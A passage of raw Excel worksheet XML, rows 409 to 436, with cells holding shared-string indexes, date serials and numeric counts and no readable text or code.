      </c>
      <c r="O409" s="95" t="s">
        <v>1517</v>
      </c>
      <c r="Q409" s="95" t="s">
        <v>1507</v>
      </c>
      <c r="R409">
        <v>12165</v>
      </c>
      <c r="S409">
        <v>13378</v>
      </c>
      <c r="T409">
        <v>18385</v>
      </c>
      <c r="U409">
        <v>17411</v>
      </c>
      <c r="V409">
        <v>21476</v>
      </c>
      <c r="W409" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="410" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A410" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B410" s="52">
        <v>44504.903723043979</v>
      </c>
      <c r="C410" s="95" t="s">
        <v>1502</v>
      </c>
      <c r="D410" s="96">
        <v>1115</v>
      </c>
      <c r="E410" s="95" t="s">
        <v>1518</v>
      </c>
      <c r="F410" s="42">
        <v>103</v>
      </c>
      <c r="G410" s="95" t="s">
        <v>1519</v>
      </c>
      <c r="H410" t="s">
        <v>1520</v>
      </c>
      <c r="I410" t="s">
        <v>156</v>
      </c>
      <c r="J410" s="95" t="s">
        <v>438</v>
      </c>
      <c r="K410" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L410" t="s">
        <v>77</v>
      </c>
      <c r="M410" s="95" t="s">
        <v>509</v>
      </c>
      <c r="N410" t="s">
        <v>510</v>
      </c>
      <c r="Q410" s="95" t="s">
        <v>1507</v>
      </c>
      <c r="R410">
        <v>812</v>
      </c>
      <c r="S410">
        <v>5734</v>
      </c>
      <c r="T410">
        <v>1540</v>
      </c>
      <c r="U410">
        <v>2081</v>
      </c>
      <c r="V410">
        <v>15679</v>
      </c>
      <c r="W410" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="411" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A411" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B411" s="52">
        <v>44622.698677766202</v>
      </c>
      <c r="C411" s="95" t="s">
        <v>1521</v>
      </c>
      <c r="D411" s="96">
        <v>101</v>
      </c>
      <c r="E411" s="95" t="s">
        <v>1522</v>
      </c>
      <c r="F411" s="42">
        <v>101</v>
      </c>
      <c r="G411" s="95" t="s">
        <v>1523</v>
      </c>
      <c r="H411" t="s">
        <v>1524</v>
      </c>
      <c r="I411" t="s">
        <v>156</v>
      </c>
      <c r="J411" s="95" t="s">
        <v>438</v>
      </c>
      <c r="K411" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L411" t="s">
        <v>77</v>
      </c>
      <c r="M411" s="95" t="s">
        <v>509</v>
      </c>
      <c r="N411" t="s">
        <v>510</v>
      </c>
      <c r="O411" s="95" t="s">
        <v>1525</v>
      </c>
      <c r="Q411" s="95" t="s">
        <v>1526</v>
      </c>
      <c r="R411">
        <v>257824</v>
      </c>
      <c r="S411">
        <v>232178</v>
      </c>
      <c r="T411">
        <v>197494</v>
      </c>
      <c r="U411">
        <v>155211</v>
      </c>
      <c r="V411">
        <v>158834</v>
      </c>
      <c r="W411" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="412" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A412" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B412" s="52">
        <v>44504.903723020834</v>
      </c>
      <c r="C412" s="95" t="s">
        <v>1502</v>
      </c>
      <c r="D412" s="96">
        <v>1115</v>
      </c>
      <c r="E412" s="95" t="s">
        <v>1527</v>
      </c>
      <c r="F412" s="42">
        <v>105</v>
      </c>
      <c r="G412" s="95" t="s">
        <v>1528</v>
      </c>
      <c r="H412" t="s">
        <v>1529</v>
      </c>
      <c r="I412" t="s">
        <v>156</v>
      </c>
      <c r="J412" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K412" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L412" t="s">
        <v>77</v>
      </c>
      <c r="M412" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N412" t="s">
        <v>476</v>
      </c>
      <c r="Q412" s="95" t="s">
        <v>1507</v>
      </c>
      <c r="R412">
        <v>24196</v>
      </c>
      <c r="S412">
        <v>22051</v>
      </c>
      <c r="T412">
        <v>22952</v>
      </c>
      <c r="U412">
        <v>19328</v>
      </c>
      <c r="V412">
        <v>22712</v>
      </c>
      <c r="W412" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="413" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A413" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B413" s="52">
        <v>44508.353195914351</v>
      </c>
      <c r="C413" s="95" t="s">
        <v>1530</v>
      </c>
      <c r="D413" s="96">
        <v>102</v>
      </c>
      <c r="E413" s="95" t="s">
        <v>1531</v>
      </c>
      <c r="F413" s="42">
        <v>102</v>
      </c>
      <c r="G413" s="95" t="s">
        <v>1532</v>
      </c>
      <c r="H413" t="s">
        <v>1533</v>
      </c>
      <c r="I413" t="s">
        <v>156</v>
      </c>
      <c r="J413" s="95" t="s">
        <v>438</v>
      </c>
      <c r="K413" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L413" t="s">
        <v>77</v>
      </c>
      <c r="M413" s="95" t="s">
        <v>509</v>
      </c>
      <c r="N413" t="s">
        <v>510</v>
      </c>
      <c r="O413" s="95" t="s">
        <v>1534</v>
      </c>
      <c r="Q413" s="95" t="s">
        <v>1535</v>
      </c>
      <c r="R413">
        <v>31557</v>
      </c>
      <c r="S413">
        <v>379090</v>
      </c>
      <c r="T413">
        <v>220842</v>
      </c>
      <c r="U413">
        <v>676274</v>
      </c>
      <c r="V413">
        <v>710873</v>
      </c>
      <c r="W413" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="414" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A414" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B414" s="52">
        <v>43566.596765949071</v>
      </c>
      <c r="C414" s="95" t="s">
        <v>1536</v>
      </c>
      <c r="D414" s="96">
        <v>110</v>
      </c>
      <c r="E414" s="95" t="s">
        <v>1537</v>
      </c>
      <c r="F414" s="42">
        <v>110</v>
      </c>
      <c r="G414" s="95" t="s">
        <v>1538</v>
      </c>
      <c r="H414" t="s">
        <v>1539</v>
      </c>
      <c r="I414" t="s">
        <v>103</v>
      </c>
      <c r="J414" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K414" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L414" t="s">
        <v>77</v>
      </c>
      <c r="M414" s="95" t="s">
        <v>104</v>
      </c>
      <c r="O414" s="95" t="s">
        <v>1540</v>
      </c>
      <c r="Q414" s="95" t="s">
        <v>1541</v>
      </c>
      <c r="R414">
        <v>4113</v>
      </c>
      <c r="S414">
        <v>2526</v>
      </c>
      <c r="W414" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="415" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A415" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B415" s="52">
        <v>44314.92263760417</v>
      </c>
      <c r="C415" s="95" t="s">
        <v>1536</v>
      </c>
      <c r="D415" s="96">
        <v>231</v>
      </c>
      <c r="E415" s="95" t="s">
        <v>1537</v>
      </c>
      <c r="F415" s="42">
        <v>120</v>
      </c>
      <c r="G415" s="95" t="s">
        <v>1538</v>
      </c>
      <c r="H415" t="s">
        <v>1539</v>
      </c>
      <c r="I415" t="s">
        <v>103</v>
      </c>
      <c r="J415" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K415" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L415" t="s">
        <v>77</v>
      </c>
      <c r="M415" s="95" t="s">
        <v>104</v>
      </c>
      <c r="O415" s="95" t="s">
        <v>105</v>
      </c>
      <c r="Q415" s="95" t="s">
        <v>1542</v>
      </c>
      <c r="R415">
        <v>31036</v>
      </c>
      <c r="S415">
        <v>31787</v>
      </c>
      <c r="W415" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="416" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A416" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B416" s="52">
        <v>44314.92263760417</v>
      </c>
      <c r="C416" s="95" t="s">
        <v>1536</v>
      </c>
      <c r="D416" s="96">
        <v>310</v>
      </c>
      <c r="E416" s="95" t="s">
        <v>1537</v>
      </c>
      <c r="F416" s="42">
        <v>200</v>
      </c>
      <c r="G416" s="95" t="s">
        <v>1538</v>
      </c>
      <c r="H416" t="s">
        <v>1539</v>
      </c>
      <c r="I416" t="s">
        <v>103</v>
      </c>
      <c r="J416" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K416" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L416" t="s">
        <v>77</v>
      </c>
      <c r="M416" s="95" t="s">
        <v>104</v>
      </c>
      <c r="O416" s="95" t="s">
        <v>105</v>
      </c>
      <c r="Q416" s="95" t="s">
        <v>142</v>
      </c>
      <c r="W416" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="417" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A417" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B417" s="52">
        <v>43566.596766041665</v>
      </c>
      <c r="C417" s="95" t="s">
        <v>1536</v>
      </c>
      <c r="D417" s="96">
        <v>110</v>
      </c>
      <c r="E417" s="95" t="s">
        <v>1543</v>
      </c>
      <c r="F417" s="42">
        <v>110</v>
      </c>
      <c r="G417" s="95" t="s">
        <v>1544</v>
      </c>
      <c r="H417" t="s">
        <v>1545</v>
      </c>
      <c r="I417" t="s">
        <v>103</v>
      </c>
      <c r="J417" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K417" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L417" t="s">
        <v>77</v>
      </c>
      <c r="M417" s="95" t="s">
        <v>104</v>
      </c>
      <c r="O417" s="95" t="s">
        <v>1540</v>
      </c>
      <c r="Q417" s="95" t="s">
        <v>1541</v>
      </c>
      <c r="W417" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="418" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A418" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B418" s="52">
        <v>44349.88022298611</v>
      </c>
      <c r="C418" s="95" t="s">
        <v>1536</v>
      </c>
      <c r="D418" s="96">
        <v>231</v>
      </c>
      <c r="E418" s="95" t="s">
        <v>1543</v>
      </c>
      <c r="F418" s="42">
        <v>201</v>
      </c>
      <c r="G418" s="95" t="s">
        <v>1544</v>
      </c>
      <c r="H418" t="s">
        <v>1545</v>
      </c>
      <c r="I418" t="s">
        <v>103</v>
      </c>
      <c r="J418" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K418" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L418" t="s">
        <v>77</v>
      </c>
      <c r="M418" s="95" t="s">
        <v>104</v>
      </c>
      <c r="O418" s="95" t="s">
        <v>1546</v>
      </c>
      <c r="Q418" s="95" t="s">
        <v>1542</v>
      </c>
      <c r="R418">
        <v>3051</v>
      </c>
      <c r="S418">
        <v>405</v>
      </c>
      <c r="W418" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="419" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A419" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B419" s="52">
        <v>44349.88022298611</v>
      </c>
      <c r="C419" s="95" t="s">
        <v>1536</v>
      </c>
      <c r="D419" s="96">
        <v>310</v>
      </c>
      <c r="E419" s="95" t="s">
        <v>1543</v>
      </c>
      <c r="F419" s="42">
        <v>310</v>
      </c>
      <c r="G419" s="95" t="s">
        <v>1544</v>
      </c>
      <c r="H419" t="s">
        <v>1545</v>
      </c>
      <c r="I419" t="s">
        <v>103</v>
      </c>
      <c r="J419" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K419" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L419" t="s">
        <v>77</v>
      </c>
      <c r="M419" s="95" t="s">
        <v>104</v>
      </c>
      <c r="O419" s="95" t="s">
        <v>1546</v>
      </c>
      <c r="Q419" s="95" t="s">
        <v>142</v>
      </c>
      <c r="W419" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="420" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A420" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B420" s="52">
        <v>43566.596765983799</v>
      </c>
      <c r="C420" s="95" t="s">
        <v>1536</v>
      </c>
      <c r="D420" s="96">
        <v>110</v>
      </c>
      <c r="E420" s="95" t="s">
        <v>1547</v>
      </c>
      <c r="F420" s="42">
        <v>110</v>
      </c>
      <c r="G420" s="95" t="s">
        <v>1548</v>
      </c>
      <c r="H420" t="s">
        <v>1549</v>
      </c>
      <c r="I420" t="s">
        <v>103</v>
      </c>
      <c r="J420" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K420" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L420" t="s">
        <v>77</v>
      </c>
      <c r="M420" s="95" t="s">
        <v>104</v>
      </c>
      <c r="O420" s="95" t="s">
        <v>1550</v>
      </c>
      <c r="Q420" s="95" t="s">
        <v>1541</v>
      </c>
      <c r="W420" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="421" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A421" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B421" s="52">
        <v>44349.880223009262</v>
      </c>
      <c r="C421" s="95" t="s">
        <v>1536</v>
      </c>
      <c r="D421" s="96">
        <v>231</v>
      </c>
      <c r="E421" s="95" t="s">
        <v>1547</v>
      </c>
      <c r="F421" s="42">
        <v>211</v>
      </c>
      <c r="G421" s="95" t="s">
        <v>1548</v>
      </c>
      <c r="H421" t="s">
        <v>1549</v>
      </c>
      <c r="I421" t="s">
        <v>103</v>
      </c>
      <c r="J421" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K421" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L421" t="s">
        <v>77</v>
      </c>
      <c r="M421" s="95" t="s">
        <v>104</v>
      </c>
      <c r="O421" s="95" t="s">
        <v>1550</v>
      </c>
      <c r="Q421" s="95" t="s">
        <v>1542</v>
      </c>
      <c r="R421">
        <v>445</v>
      </c>
      <c r="S421">
        <v>515</v>
      </c>
      <c r="W421" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="422" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A422" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B422" s="52">
        <v>44349.880223009262</v>
      </c>
      <c r="C422" s="95" t="s">
        <v>1536</v>
      </c>
      <c r="D422" s="96">
        <v>310</v>
      </c>
      <c r="E422" s="95" t="s">
        <v>1547</v>
      </c>
      <c r="F422" s="42">
        <v>220</v>
      </c>
      <c r="G422" s="95" t="s">
        <v>1548</v>
      </c>
      <c r="H422" t="s">
        <v>1549</v>
      </c>
      <c r="I422" t="s">
        <v>103</v>
      </c>
      <c r="J422" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K422" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L422" t="s">
        <v>77</v>
      </c>
      <c r="M422" s="95" t="s">
        <v>104</v>
      </c>
      <c r="O422" s="95" t="s">
        <v>1550</v>
      </c>
      <c r="Q422" s="95" t="s">
        <v>142</v>
      </c>
      <c r="W422" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="423" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A423" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B423" s="52">
        <v>43566.596766006944</v>
      </c>
      <c r="C423" s="95" t="s">
        <v>1536</v>
      </c>
      <c r="D423" s="96">
        <v>110</v>
      </c>
      <c r="E423" s="95" t="s">
        <v>1551</v>
      </c>
      <c r="F423" s="42">
        <v>110</v>
      </c>
      <c r="G423" s="95" t="s">
        <v>1552</v>
      </c>
      <c r="H423" t="s">
        <v>1553</v>
      </c>
      <c r="I423" t="s">
        <v>103</v>
      </c>
      <c r="J423" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K423" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L423" t="s">
        <v>77</v>
      </c>
      <c r="M423" s="95" t="s">
        <v>104</v>
      </c>
      <c r="O423" s="95" t="s">
        <v>1554</v>
      </c>
      <c r="Q423" s="95" t="s">
        <v>1541</v>
      </c>
      <c r="R423">
        <v>2358</v>
      </c>
      <c r="S423">
        <v>953</v>
      </c>
      <c r="W423" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="424" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A424" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B424" s="52">
        <v>44314.922637638891</v>
      </c>
      <c r="C424" s="95" t="s">
        <v>1536</v>
      </c>
      <c r="D424" s="96">
        <v>231</v>
      </c>
      <c r="E424" s="95" t="s">
        <v>1551</v>
      </c>
      <c r="F424" s="42">
        <v>120</v>
      </c>
      <c r="G424" s="95" t="s">
        <v>1552</v>
      </c>
      <c r="H424" t="s">
        <v>1553</v>
      </c>
      <c r="I424" t="s">
        <v>103</v>
      </c>
      <c r="J424" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K424" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L424" t="s">
        <v>77</v>
      </c>
      <c r="M424" s="95" t="s">
        <v>104</v>
      </c>
      <c r="O424" s="95" t="s">
        <v>1554</v>
      </c>
      <c r="Q424" s="95" t="s">
        <v>1542</v>
      </c>
      <c r="W424" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="425" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A425" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B425" s="52">
        <v>44314.922637638891</v>
      </c>
      <c r="C425" s="95" t="s">
        <v>1536</v>
      </c>
      <c r="D425" s="96">
        <v>310</v>
      </c>
      <c r="E425" s="95" t="s">
        <v>1551</v>
      </c>
      <c r="F425" s="42">
        <v>200</v>
      </c>
      <c r="G425" s="95" t="s">
        <v>1552</v>
      </c>
      <c r="H425" t="s">
        <v>1553</v>
      </c>
      <c r="I425" t="s">
        <v>103</v>
      </c>
      <c r="J425" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K425" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L425" t="s">
        <v>77</v>
      </c>
      <c r="M425" s="95" t="s">
        <v>104</v>
      </c>
      <c r="O425" s="95" t="s">
        <v>1554</v>
      </c>
      <c r="Q425" s="95" t="s">
        <v>142</v>
      </c>
      <c r="W425" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="426" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A426" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B426" s="52">
        <v>43566.596766030096</v>
      </c>
      <c r="C426" s="95" t="s">
        <v>1536</v>
      </c>
      <c r="D426" s="96">
        <v>110</v>
      </c>
      <c r="E426" s="95" t="s">
        <v>1555</v>
      </c>
      <c r="F426" s="42">
        <v>110</v>
      </c>
      <c r="G426" s="95" t="s">
        <v>1556</v>
      </c>
      <c r="H426" t="s">
        <v>1557</v>
      </c>
      <c r="I426" t="s">
        <v>103</v>
      </c>
      <c r="J426" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K426" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L426" t="s">
        <v>77</v>
      </c>
      <c r="M426" s="95" t="s">
        <v>104</v>
      </c>
      <c r="O426" s="95" t="s">
        <v>1554</v>
      </c>
      <c r="Q426" s="95" t="s">
        <v>1541</v>
      </c>
      <c r="R426">
        <v>1</v>
      </c>
      <c r="W426" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="427" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A427" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B427" s="52">
        <v>43566.596766030096</v>
      </c>
      <c r="C427" s="95" t="s">
        <v>1536</v>
      </c>
      <c r="D427" s="96">
        <v>231</v>
      </c>
      <c r="E427" s="95" t="s">
        <v>1555</v>
      </c>
      <c r="F427" s="42">
        <v>110</v>
      </c>
      <c r="G427" s="95" t="s">
        <v>1556</v>
      </c>
      <c r="H427" t="s">
        <v>1557</v>
      </c>
      <c r="I427" t="s">
        <v>103</v>
      </c>
      <c r="J427" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K427" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L427" t="s">
        <v>77</v>
      </c>
      <c r="M427" s="95" t="s">
        <v>104</v>
      </c>
      <c r="O427" s="95" t="s">
        <v>1554</v>
      </c>
      <c r="Q427" s="95" t="s">
        <v>1542</v>
      </c>
      <c r="R427">
        <v>1</v>
      </c>
      <c r="W427" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="428" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A428" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B428" s="52">
        <v>43566.596766030096</v>
      </c>
      <c r="C428" s="95" t="s">
        <v>1536</v>
      </c>
      <c r="D428" s="96">
        <v>310</v>
      </c>
      <c r="E428" s="95" t="s">
        <v>1555</v>
      </c>
      <c r="F428" s="42">
        <v>110</v>
      </c>
      <c r="G428" s="95" t="s">
        <v>1556</v>
      </c>
      <c r="H428" t="s">
        <v>1557</v>
      </c>
      <c r="I428" t="s">
        <v>103</v>
      </c>
      <c r="J428" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K428" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L428" t="s">
        <v>77</v>
      </c>
      <c r="M428" s="95" t="s">
        <v>104</v>
      </c>
      <c r="O428" s="95" t="s">
        <v>1554</v>
      </c>
      <c r="Q428" s="95" t="s">
        <v>142</v>
      </c>
      <c r="R428">
        <v>1</v>
      </c>
      <c r="W428" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="429" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A429" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B429" s="52">
        <v>44105.684892442128</v>
      </c>
      <c r="C429" s="95" t="s">
        <v>1558</v>
      </c>
      <c r="D429" s="96">
        <v>103</v>
      </c>
      <c r="E429" s="95" t="s">
        <v>1559</v>
      </c>
      <c r="F429" s="42">
        <v>103</v>
      </c>
      <c r="G429" s="95" t="s">
        <v>1548</v>
      </c>
      <c r="H429" t="s">
        <v>1560</v>
      </c>
      <c r="I429" t="s">
        <v>75</v>
      </c>
      <c r="J429" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K429" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L429" t="s">
        <v>77</v>
      </c>
      <c r="M429" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N429" t="s">
        <v>221</v>
      </c>
      <c r="O429" s="95" t="s">
        <v>1561</v>
      </c>
      <c r="P429" t="s">
        <v>222</v>
      </c>
      <c r="Q429" s="95" t="s">
        <v>1562</v>
      </c>
      <c r="R429">
        <v>735631</v>
      </c>
      <c r="S429">
        <v>669335</v>
      </c>
      <c r="T429">
        <v>665532</v>
      </c>
      <c r="U429">
        <v>594540</v>
      </c>
      <c r="V429">
        <v>744336</v>
      </c>
      <c r="W429" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="430" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A430" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B430" s="52">
        <v>44180.61579708333</v>
      </c>
      <c r="C430" s="95" t="s">
        <v>1563</v>
      </c>
      <c r="D430" s="96">
        <v>102</v>
      </c>
      <c r="E430" s="95" t="s">
        <v>1564</v>
      </c>
      <c r="F430" s="42">
        <v>102</v>
      </c>
      <c r="G430" s="95" t="s">
        <v>1565</v>
      </c>
      <c r="H430" t="s">
        <v>1566</v>
      </c>
      <c r="I430" t="s">
        <v>75</v>
      </c>
      <c r="J430" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K430" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L430" t="s">
        <v>77</v>
      </c>
      <c r="M430" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N430" t="s">
        <v>221</v>
      </c>
      <c r="O430" s="95" t="s">
        <v>1567</v>
      </c>
      <c r="Q430" s="95" t="s">
        <v>1568</v>
      </c>
      <c r="R430">
        <v>901</v>
      </c>
      <c r="S430">
        <v>815</v>
      </c>
      <c r="T430">
        <v>721</v>
      </c>
      <c r="U430">
        <v>703</v>
      </c>
      <c r="V430">
        <v>3070</v>
      </c>
      <c r="W430" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="431" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A431" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B431" s="52">
        <v>44180.615797106482</v>
      </c>
      <c r="C431" s="95" t="s">
        <v>1563</v>
      </c>
      <c r="D431" s="96">
        <v>102</v>
      </c>
      <c r="E431" s="95" t="s">
        <v>1569</v>
      </c>
      <c r="F431" s="42">
        <v>102</v>
      </c>
      <c r="G431" s="95" t="s">
        <v>1570</v>
      </c>
      <c r="H431" t="s">
        <v>1571</v>
      </c>
      <c r="I431" t="s">
        <v>268</v>
      </c>
      <c r="J431" s="95" t="s">
        <v>1572</v>
      </c>
      <c r="K431" s="95" t="s">
        <v>33</v>
      </c>
      <c r="L431" t="s">
        <v>83</v>
      </c>
      <c r="M431" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O431" s="95" t="s">
        <v>1573</v>
      </c>
      <c r="Q431" s="95" t="s">
        <v>1568</v>
      </c>
      <c r="R431">
        <v>901</v>
      </c>
      <c r="S431">
        <v>810</v>
      </c>
      <c r="T431">
        <v>724</v>
      </c>
      <c r="U431">
        <v>720</v>
      </c>
      <c r="V431">
        <v>3027</v>
      </c>
      <c r="W431" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="432" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A432" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B432" s="52">
        <v>44431.622155011573</v>
      </c>
      <c r="C432" s="95" t="s">
        <v>1574</v>
      </c>
      <c r="D432" s="96">
        <v>131</v>
      </c>
      <c r="E432" s="95" t="s">
        <v>1575</v>
      </c>
      <c r="F432" s="42">
        <v>132</v>
      </c>
      <c r="G432" s="95" t="s">
        <v>1576</v>
      </c>
      <c r="H432" t="s">
        <v>1577</v>
      </c>
      <c r="I432" t="s">
        <v>75</v>
      </c>
      <c r="J432" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K432" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L432" t="s">
        <v>77</v>
      </c>
      <c r="M432" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N432" t="s">
        <v>91</v>
      </c>
      <c r="O432" s="95" t="s">
        <v>1578</v>
      </c>
      <c r="Q432" s="95" t="s">
        <v>1579</v>
      </c>
      <c r="R432">
        <v>2987</v>
      </c>
      <c r="S432">
        <v>2788</v>
      </c>
      <c r="T432">
        <v>2427</v>
      </c>
      <c r="U432">
        <v>2126</v>
      </c>
      <c r="V432">
        <v>2389</v>
      </c>
      <c r="W432" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="433" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A433" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B433" s="52"/>
      <c r="C433" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D433" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E433" s="95" t="s">
        <v>1580</v>
      </c>
      <c r="F433" s="42">
        <v>100</v>
      </c>
      <c r="G433" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H433" t="s">
        <v>1581</v>
      </c>
      <c r="I433" t="s">
        <v>179</v>
      </c>
      <c r="J433" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K433" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L433" t="s">
        <v>77</v>
      </c>
      <c r="Q433" s="95" t="s">
        <v>458</v>
      </c>
      <c r="W433" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="434" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A434" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B434" s="52"/>
      <c r="C434" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D434" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E434" s="95" t="s">
        <v>1582</v>
      </c>
      <c r="F434" s="42">
        <v>100</v>
      </c>
      <c r="G434" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H434" t="s">
        <v>1583</v>
      </c>
      <c r="I434" t="s">
        <v>179</v>
      </c>
      <c r="J434" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K434" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L434" t="s">
        <v>77</v>
      </c>
      <c r="P434" t="s">
        <v>181</v>
      </c>
      <c r="Q434" s="95" t="s">
        <v>1584</v>
      </c>
      <c r="W434" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="435" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A435" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B435" s="52"/>
      <c r="C435" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D435" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E435" s="95" t="s">
        <v>1585</v>
      </c>
      <c r="F435" s="42">
        <v>100</v>
      </c>
      <c r="G435" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H435" t="s">
        <v>1586</v>
      </c>
      <c r="I435" t="s">
        <v>179</v>
      </c>
      <c r="J435" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K435" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L435" t="s">
        <v>77</v>
      </c>
      <c r="P435" t="s">
        <v>181</v>
      </c>
      <c r="Q435" s="95" t="s">
        <v>1587</v>
      </c>
      <c r="W435" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="436" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A436" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B436" s="52"/>
      <c r="C436" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D436" s="96" t="s">
        <v>72</v>
      </c>
